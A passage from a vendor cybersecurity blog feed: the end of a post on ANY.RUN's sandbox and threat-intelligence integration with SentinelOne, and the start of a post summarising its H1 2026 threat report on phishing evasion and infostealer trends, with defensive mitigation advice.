<li><strong>Faster Time-to-Verdict:</strong> By automating the submission process, analysts receive a definitive verdict in minutes, significantly reducing <strong>MTTR</strong> (Mean Time to Resolution).  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Reduced Manual Routine:</strong> Eliminates the need for analysts to manually export files or copy-paste URLs into external tools, preventing &#8220;console fatigue&#8221;.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Standardized Triage:</strong> Templates ensure that every suspicious artifact is analyzed using the same rigorous methodology, regardless of the analyst&#8217;s experience level.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Higher Detection of Evasive Threats:</strong> Behavioral analysis catches advanced threats that often bypass the static detection layers of an EDR.  </li>
</ul>



<h3 class="wp-block-heading">Practical Use Case: Automated Malware Triage </h3>



<p class="wp-block-paragraph">When an alert triggers due to a suspicious file execution, the Hyperautomation workflow automatically or manually sends the file itself to the ANY.RUN Sandbox. The analyst immediately sees a &#8220;Malicious&#8221; verdict in the alert Notes, allowing them to initiate containment actions without ever leaving the SentinelOne console.  </p>



<h2 class="wp-block-heading">2. ANY.RUN Threat Intelligence Lookup: Identify and Prioritize Risks Faster </h2>



<p class="wp-block-paragraph">This <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Lookup</strong></a> component, available via Singularity Hyperautomation, provides <strong>on-demand enrichment of indicators</strong> using ANY.RUN’s vast database of millions of previous sandbox investigations across 16,000 organizations and 700,000 analysts.</p>



<p class="wp-block-paragraph">The moment a suspicious file hash, IP, or domain appears, the system scans ANY.RUN&#8217;s threat intelligence history. Analysts can also <strong>force a manual check</strong> at any point during active hunting. The resulting intelligence, including <strong>threat tags, industry targeting info, and &#8220;last seen&#8221; data</strong>, is seamlessly added <strong>directly into the SentinelOne alert&#8217;s Notes</strong>.  </p>



<p class="wp-block-paragraph"><strong>Benefits:</strong>  </p>



<ul class="wp-block-list">
<li><strong>Smarter Prioritization:</strong> Immediate access to industry targeting data helps SOC managers quickly identify if they are facing a serious incident.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Fewer Tier 2 Escalations:</strong> Tier 1 analysts gain enough context to <strong>confidently close false positives</strong> or <strong>resolve actual threats </strong>on their own, reducing bottlenecks.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Enhanced Decision Accuracy:</strong> Access to historical behavioral data from over 700,000 analysts worldwide <strong>reduces the risk of incorrect alert closures</strong>.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Improved Quality of Evidence:</strong> Escalated cases include a <strong>full TI context</strong>, allowing senior investigators to start their work with a complete picture of the threat.  </li>
</ul>



<h3 class="wp-block-heading">Practical Use Case: IOC Enrichment during Investigation </h3>



<p class="wp-block-paragraph">When a Singularity alert flags a suspicious file execution, the system can instantly run a TI Lookup enrichment for the specific file hash.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="439" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image1-1024x439.png" alt="" class="wp-image-23118" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image1-1024x439.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image1-300x129.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image1-768x329.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image1-1536x659.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image1-370x159.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image1-270x116.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image1-740x317.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image1.png 1873w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup provides alert context in seconds</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Within seconds, a note pops up in the console revealing that the hash matches a <strong>known ransomware strain previously analyzed in ANY.RUN’s Sandbox</strong>. Instead of wasting time on manual research, the analyst immediately gets the full threat profile, allowing them to quarantine the host right away without ever leaving the console.  </p>



<h2 class="wp-block-heading"> 3. ANY.RUN Threat Intelligence Feeds: Upgrade Defense Against Emerging Threats </h2>



<p class="wp-block-paragraph">The <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Feeds</strong></a> integration utilizes the<strong> native TAXII Connect IOC Ingestion app</strong> found in the <strong>SentinelOne Marketplace </strong>to systematically fortify your environment.</p>



<p class="wp-block-paragraph">This component establishes a <strong>continuous, live stream of verified malicious IPs, domains, and URLs from ANY.RUN</strong> directly into your perimeter. The indicators are extracted and delivered in real time from the newest sandbox investigations of emerging malware &amp; phishing threats across 16,000 organizations and 700,000 analysts around the world.  </p>



<p class="wp-block-paragraph">Utilizing the standardized <strong>built-in STIX/TAXII mechanism</strong>, it completely eliminates the need for custom scripts or maintenance overhead. The system silently cross-references endpoint traffic against these fresh indicators, <strong>automatically triggering native high-priority matches</strong> the second an internal asset interacts with a blacklisted entity.  </p>



<p class="wp-block-paragraph"><strong>Benefits:</strong>  </p>



<ul class="wp-block-list">
<li><strong>Proactive Threat Detection:</strong> Fresh indicators are added to the system as soon as they appear in live sandbox investigations, improving MTTD (Mean Time to Detection).  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Elimination of Blind Spots:</strong> Provides access to <strong>99% unique malicious infrastructure</strong> that traditional, slower-moving feeds often miss.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Reduced Tier 1 Workload:</strong> Because indicators are pre-verified as malicious, the resulting alerts are <strong>high-fidelity</strong>, leading to fewer false positives to investigate.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Scalable Operational TI:</strong> The integration scales across multiple sites and configurations, making it <strong>ideal for large </strong><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener"><strong>Enterprises</strong></a><strong> and </strong><a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktomssplanding" target="_blank" rel="noreferrer noopener"><strong>MSSPs</strong></a>.  </li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Integrate fresh Threat Intelligence to identify attacks early.</span> 
<br>
Eliminate blind spots and upgrade overall SOC ROI.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Integrate ANY.RUN</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Practical Use Case: Detecting Emerging Campaigns </h3>



<p class="wp-block-paragraph">When a fresh phishing campaign targeting your sector is active globally, its malicious infrastructure is <strong>streamed to SentinelOne in real-time</strong>. If an employee clicks an obfuscated link from that specific campaign minutes later, SentinelOne’s native detection engine identifies the match against the ingested indicators, instantly blocking the connection and flagging a critical alert. This protection happens automatically at the platform level, stopping advanced attacks based on fresh global telemetry.  </p>



<h2 class="wp-block-heading">How to Integrate ANY.RUN with SentinelOne Singularity </h2>



<p class="wp-block-paragraph">The integration is designed for rapid deployment, utilizing native SentinelOne modules to ensure that setup does not require custom scripts or complex development. Depending on the product you are connecting, there are two primary paths for integration.  </p>



<h3 class="wp-block-heading">1. Integrating Sandbox &amp; TI Lookup (via Singularity Hyperautomation)</h3>



<p class="wp-block-paragraph">The Sandbox and TI Lookup components are implemented through <a href="https://www.sentinelone.com/platform/singularity-hyperautomation/" target="_blank" rel="noreferrer noopener"><strong>Singularity Hyperautomation</strong></a>.</p>



<ul class="wp-block-list">
<li><strong>Step 1: Connect the ANY.RUN Integration</strong>  </li>
</ul>



<p class="wp-block-paragraph">Navigate to the <strong>Hyperautomation</strong> section in your SentinelOne console. Open the <strong>Integrations</strong> tab, locate <strong>ANY.RUN</strong>, and click &#8220;Connect.&#8221; You will need to provide your <strong>ANY.RUN API key</strong> to establish the link.  </p>



<ul class="wp-block-list">
<li><strong>Step 2: Install Workflow Templates</strong>  </li>
</ul>



<p class="wp-block-paragraph">Go to the <strong>Templates</strong> section within Hyperautomation and search for ANY.RUN. Select and install the templates that fit your SOC needs, such as:  </p>



<ul class="wp-block-list">
<li><strong>TI Lookup workflow</strong> for indicator enrichment.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Sandbox URL workflow</strong> for automated URL analysis.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Sandbox file workflow</strong> for automated file analysis.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Step 3: Configure Automation Criteria</strong>  </li>
</ul>



<p class="wp-block-paragraph">Set the specific rules for when these workflows should trigger (e.g., based on <strong>alert severity</strong>, name, or type).  </p>



<ul class="wp-block-list">
<li><strong>Step 4: Define Analysis Parameters</strong>  </li>
</ul>



<p class="wp-block-paragraph">For Sandbox templates, specify the OS and environment version for the analysis. For TI Lookup, define which alert indicators (hash, IP, or URL) should be checked. Note that you will also need to create a password for the workflow as a technical requirement of the platform.  </p>



<p class="wp-block-paragraph"><strong><em>Note:</em></strong><em> Singularity Hyperautomation is an independently licensed module within the SentinelOne platform.</em>  </p>



<h3 class="wp-block-heading">2. Integrating TI Feeds (via SentinelOne Marketplace)</h3>



<p class="wp-block-paragraph">The TI Feeds connector uses the native <strong>TAXII Connect IOC Ingestion</strong> app to stream verified indicators directly into your detection logic.  </p>



<ul class="wp-block-list">
<li><strong>Step 1: Install the Connector</strong>  </li>
</ul>



<p class="wp-block-paragraph">Open the <a href="https://www.sentinelone.com/partners/singularity-marketplace/" target="_blank" rel="noreferrer noopener"><strong>SentinelOne Singularity Marketplace</strong></a>, find the <strong>TAXII Connect IOC Ingestion</strong> integration, and install it.</p>



<ul class="wp-block-list">
<li><strong>Step 2: Create the Configuration </strong> </li>
</ul>



<p class="wp-block-paragraph">Within the app, create a new configuration and provide the following details:  </p>



<ul class="wp-block-list">
<li><strong>Name and Scope:</strong> Define the configuration&#8217;s identity within your environment.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Endpoint URL:</strong> Enter the TAXII URL for your desired ANY.RUN TI Feeds collection (e.g., &#8220;All Indicators,&#8221; &#8220;IPs,&#8221; &#8220;Domains,&#8221; or &#8220;URLs&#8221;).  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Credentials:</strong> Provide the <strong>username and password</strong> associated with your ANY.RUN TI Feeds subscription.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Step 3: Operationalization</strong>  </li>
</ul>



<p class="wp-block-paragraph">Once connected, indicators will automatically stream into the system. If an ingested indicator matches an event on an endpoint, SentinelOne will generate a native <strong>&#8220;Threat Intelligence Indicator Match&#8221;</strong> alert in the console.  </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph">Trusted by 700,000+ cybersecurity professionals and 16,000+ organizations across critical industries, including <a href="https://any.run/cybersecurity-blog/fortune-500-enterprise-success-story/" target="_blank" rel="noreferrer noopener"><strong>64% of Fortune 500</strong></a> companies, <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong> </a>helps security teams detect and investigate threats faster.</p>



<p class="wp-block-paragraph">Our <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a> provides real-time behavioral analysis of suspicious files and URLs, enabling confident triage and response.</p>



<p class="wp-block-paragraph"><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Lookup</strong></a> and <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Feeds</strong></a> deliver live, verified threat data that strengthens detection and improves prioritization.</p>



<p class="wp-block-paragraph">By embedding analysis and intelligence into daily SOC workflows, ANY.RUN helps organizations reduce response time, lower operational costs, and minimize security risk.  </p>
<p>The post <a href="https://any.run/cybersecurity-blog/sentinelone-integration/">ANY.RUN &amp; SentinelOne: One Workspace, Instant Context for Rapid Response</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/sentinelone-integration/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>6 Months on Alert: Get H1 2026 Cyber Risk Report for SOCs and MSSPs</title>
		<link>https://any.run/cybersecurity-blog/h1-2026-cyber-risk-report/</link>
					<comments>https://any.run/cybersecurity-blog/h1-2026-cyber-risk-report/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Tue, 15 Sep 2026 09:05:12 +0000</pubDate>
				<category><![CDATA[Reports]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23088</guid>

					<description><![CDATA[<p>ANY.RUN has released its H1 Cyber Risk Report, built on unique data from real-world submissions analyzed in the ANY.RUN Interactive Sandbox from January to June 2026 by over 700,000 analysts and 16,000 SOC teams. The report highlights 15 key trends and explains what these changes mean for analysts, SOC teams, MSSPs, and business decision-makers. With [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/h1-2026-cyber-risk-report/">6 Months on Alert: Get H1 2026 Cyber Risk Report for SOCs and MSSPs</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> has released its H1 Cyber Risk Report, built on unique data from real-world submissions analyzed in the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN Interactive Sandbox</a> from January to June 2026 by over 700,000 analysts and 16,000 SOC teams. </p>



<p class="wp-block-paragraph">The report highlights 15 key trends and explains what these changes mean for analysts, SOC teams, MSSPs, and business decision-makers. With supporting data and examples, ANY.RUN discuses prevalent attack paths, their practical impact on threat detection, alert triage, investigation, and incident response, as well as proposes mitigation guidance. </p>



<!-- CTA Split START -->
<div class="cta-split">
<div class="cta__split-left">

<!-- Image -->
<img decoding="async" loading="lazy" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/v1-H1-cover-2-scaled.png" alt="Q1 2026 Threat Report from ANY.RUN" class="cta__split-icon">
</div>

<div class="cta__split-right">
<div>

<!-- Heading -->
<h3 class="cta__split-heading">H1 2026 Cyber Risk Report</h3>

<!-- Text -->
<p class="cta__split-text">
Discover top trends shaping the modern threat landscape:
 </p><ul>
    <li>OAuth device-code phishing surged by <strong>483.7%</strong>.</li>
    <li>Cloud infrastructure abuse is up by <strong>90.7%</strong>.</li>
    <li>RMM attacks jumped by <strong>26.5%</strong>.</li>
  </ul>
<br>

</div>
<!-- CTA Link -->
<a target="_blank" rel="noopener" id="article-banner-split" href="https://files.any.run/images/h1_2026_cyber_risk_report_by_anyrun.pdf"><div class="cta__split-link">Get FREE report</div></a>
</div>
</div>
<!-- CTA Split END -->
<!-- CTA Split Styles START -->
<style>
.cta-split {
overflow: hidden;
margin: 3rem 0;
display: grid;
justify-items: center;
border-radius: 0.5rem;
width: 100%;
min-height: 25rem;
grid-template-columns: repeat(2, 1fr);
border: 1px solid rgba(75, 174, 227, 0.32);
font-family: 'Catamaran Bold';
}

.cta__split-left {
display: flex;
align-items: center;
justify-content: center;
height: 100%;
width: 100%;
background-color: #161c59;
background-position: center center;
background: rgba(32, 168, 241, 0.1);
}

.cta__split-icon { 
width: 100%;
height: auto;
object-fit: contain;
max-width: 100%;
}

.cta__split-right {
display: flex;
flex-direction: column;
justify-content: space-between;
padding: 2rem;
}

.cta__split-heading { font-size: 1.5rem; }

.cta__split-text {
margin-top: 1rem;
font-family: Lato, Roboto, sans-serif;
}

.cta__split-link {
padding: 0.5rem 1rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: white;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
display: block;
z-index: 1000;
position: relative;
cursor: pointer !important;
}

.cta__split-link:hover {
background-color: #68CBFF;
color: white;
cursor: pointer;
}

.highlight { color: #ea2526;}


/* Mobile styles START */
@media only screen and (max-width: 768px) {

.cta-split {
grid-template-columns: 1fr;
min-height: auto;
}

.cta__split-left {
height: auto;
min-height: 10rem;
}


.cta__split-left, .cta__split-right {
height: auto;
}

.cta__split-heading { font-size: 1.2rem; }

.cta__split-text { font-size: 1rem; }
.cta__split-icon {
max-height: auto;
object-fit: cover;
}

}
/* Mobile styles END */
</style>
<!-- CTA Split Styles END -->



<h2 class="wp-block-heading">Built on Real-World Threat Investigations</h2>



<p class="wp-block-paragraph">Like all ANY.RUN solutions, the H1 2026 Cyber Risk Report is based on threat activity observed across ANY.RUN’s global user base, including SOC teams, <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSPs</a>, <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">enterprise security teams</a>, researchers, and analysts investigating real malware and phishing cases.  </p>



<p class="wp-block-paragraph">ANY.RUN is used by 16K+ organizations and 700K+ security professionals worldwide, including 74% of Fortune 100 companies. Such coverage gives the report visibility into threats submitted across industries, from <a href="https://any.run/by-industry/finance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktofinance" target="_blank" rel="noreferrer noopener">finance</a>, <a href="https://any.run/by-industry/healthcare/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktohealthcare" target="_blank" rel="noreferrer noopener">healthcare</a>, <a href="https://any.run/by-industry/government/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktogovernment" target="_blank" rel="noreferrer noopener">government</a>, <a href="https://any.run/by-industry/technology/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktotechnology" target="_blank" rel="noreferrer noopener">IT</a>, and <a href="https://any.run/by-industry/manufacturing/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktomanufacturing" target="_blank" rel="noreferrer noopener">manufacturing</a> to <a href="https://any.run/by-industry/energy/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktoenergy" target="_blank" rel="noreferrer noopener">energy</a> and <a href="https://any.run/by-industry/transportation/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktotransportation" target="_blank" rel="noreferrer noopener">transportation</a>. </p>



<h2 class="wp-block-heading">H1 2026 CYBER RISK REPORT BY ANY.RUN</h2>



<h2 class="wp-block-heading">Executive Summary</h2>



<ol class="wp-block-list">
<li><strong>Attackers are abusing trusted infrastructure</strong> – Threat actors increasingly hide inside legitimate tools, websites, authentication flows, cloud services, and public platforms.</li>



<li><strong>Phishing is becoming harder to validate</strong> – Custom fake CAPTCHAs, browser fingerprinting, calendar invites, and device-code flows make phishing attacks harder to detect.</li>



<li><strong>Identity compromise is moving beyond password theft</strong> – Infostealers and device-code phishing allow attackers to abuse tokens, sessions, cookies, recovery paths, and OAuth flows to maintain access.</li>



<li><strong>Business processes are becoming attack paths</strong> – Tax notifications, payment portals, government services, fines, refunds, and administrative requests are being used to target companies.</li>



<li><strong>Cross-platform and cloud-first environments increase exposure</strong> – Attacks now span Windows, Linux, macOS, developer workstations, cloud workloads, containers, and CI/CD environments.</li>



<li><strong>Static IOC-based detection is losing effectiveness</strong> – Many threats avoid static indicators by using runtime infrastructure, legitimate services, dead-drop resolvers, and dynamic delivery chains. </li>



<li><strong>Decision-makers should invest in earlier detection and broader visibility</strong> – Security teams need to close visibility gaps earlier by exposing phishing flows, malware behavior, browser activity, and threat context.</li>
</ol>



<h2 class="wp-block-heading">Trend 1: Custom fake CAPTCHAs are making phishing more evasive</h2>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="664" height="592" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.38.53.png" alt="" class="wp-image-23368 size-full" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.38.53.png 664w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.38.53-300x267.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.38.53-370x330.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.38.53-270x241.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-12.38.53-335x300.png 335w" sizes="auto, (max-width: 664px) 100vw, 664px" /></figure><div class="wp-block-media-text__content">
<p class="wp-block-paragraph">In phishing attacks, threat actors are increasingly using custom fake CAPTCHA pages instead of common providers. </p>



<p class="wp-block-paragraph">These pages act as an anti-bot and anti-sandbox gateway before the phishing site. Attackers also often add fingerprinting to track specific victims.</p>
</div></div>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading">Evasion Breaks Standard Heuristics</h4>



<p class="wp-block-paragraph">Custom fake CAPTCHAs change the expected phishing flow, weakening simple detection logic and making attacks less likely to detonate in analysis.</p>



<h4 class="wp-block-heading">One-Shot Pages Reduce Investigation Visibility</h4>



<p class="wp-block-paragraph">Phishing pages may work for the original victim but fail later during SOC investigation, making it harder to reproduce the attack.</p>



<h4 class="wp-block-heading">Kill Chain Reconstruction Becomes Harder</h4>



<p class="wp-block-paragraph">When the page cannot be analyzed fully, teams lose visibility into the attack path, related threat activity, and indicators for detection and response.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Apply a shift-left approach to phishing detection by identifying incidents as early as the fake CAPTCHA is observed, rather than only after credential entry or full phishing-page loading.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Use DPI inspection of web content in detection technologies, such as YARA rules or similar methods.</li>
</ul>



<ul class="wp-block-list">
<li>To bypass attacker evasion, utilize <a href="https://any.run/features/?utm_source=h12026_report&amp;utm_medium=report&amp;utm_campaign=h12026_report&amp;utm_term=010926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">interactive sandboxing</a> combined with residential proxies to mask the analysis environment&#8217;s nature.</li>
</ul>



<ul class="wp-block-list">
<li>For any confirmed gateway interaction, the response protocol must include immediate session revocation and credential resets.</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Cut  <span class="highlight">MTTR</span>  by <span class="highlight">21</span> min with ANY.RUN<br>Speed up investigations &#038; reduce risk exposure
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/features/?utm_source=h12026_report&amp;utm_medium=report&amp;utm_campaign=h12026_report&amp;utm_term=010926&amp;utm_content=linktosandboxlanding#contact-sales" rel="noopener" target="_blank">
Integrate in Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph"><strong>Read more:</strong> <a href="https://any.run/cybersecurity-blog/click-fix-attacks-eric-parker-analysis/" target="_blank" rel="noreferrer noopener">ClickFix Explosion: Cross-Platform Social Engineering Turns Users Into Malware Installers</a></p>



<h2 class="wp-block-heading"><strong>Trend 2: Browser fingerprinting helps attackers avoid detection</strong></h2>



<p class="wp-block-paragraph">Nearly all major <a href="https://any.run/malware-trends/phishingkit/" target="_blank" rel="noreferrer noopener">PhaaS frameworks</a> now use browser fingerprinting to check the client environment (e.g., device type, OS, and region).</p>



<p class="wp-block-paragraph">The goal is to control who reaches the phishing page and redirect bots or sandboxes to legitimate websites to reduce suspicion.</p>



<h4 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h4>



<h4 class="wp-block-heading">Dynamic Analysis Becomes Less Reliable</h4>



<p class="wp-block-paragraph">Browser fingerprinting increases the risk that samples will not detonate, especially when teams rely on scratch-built analysis environments such as headless browsers with specific configurations.</p>



<h4 class="wp-block-heading">Detection and Response Take Longer</h4>



<p class="wp-block-paragraph">When attacks are harder to identify and reproduce, detection rates can decrease, triage and forensics become more difficult, and MTTD/MTTR may increase.</p>



<h4 class="wp-block-heading">Investigation Efforts Face Bottlenecks</h4>



<p class="wp-block-paragraph">Security teams struggle with triage when malicious content is geofenced or filtered by OS, making it nearly impossible to map the full kill chain without specialized tools that can mimic real-user conditions.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Use analysis environments that can better reproduce real-user browser conditions and expose browser-first phishing behavior.</p>



<p class="wp-block-paragraph">For phishing attacks that rely on fingerprinting, standard file-based sandboxing is often not enough. Teams need strong URL analysis capabilities that support full dynamic investigation.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Use residential proxies and register non-standard Browser API calls, adding Canvas objects to the DOM, and collection of browser properties.</li>



<li>Analyze suspicious pages using a browser that bucketizes API property values that mask the system-specific details.</li>



<li>Integrate <a href="https://any.run/?utm_source=h12026_report&amp;utm_medium=report&amp;utm_campaign=h12026_report&amp;utm_term=010926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a> for interactive analysis of browser-based phishing, including visibility into DOM changes.</li>
</ul>



<p class="wp-block-paragraph"><strong>Read more: </strong><a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">Closing Phishing Blind Spots with In-Browser Data Inspection</a></p>



<h2 class="wp-block-heading"><strong>Trend 3: Infostealers become an identity theft system</strong></h2>



<p class="wp-block-paragraph">Infostealers are shifting from being a credential stealing malware to a more structured, affiliate-driven system for identify abuse.</p>



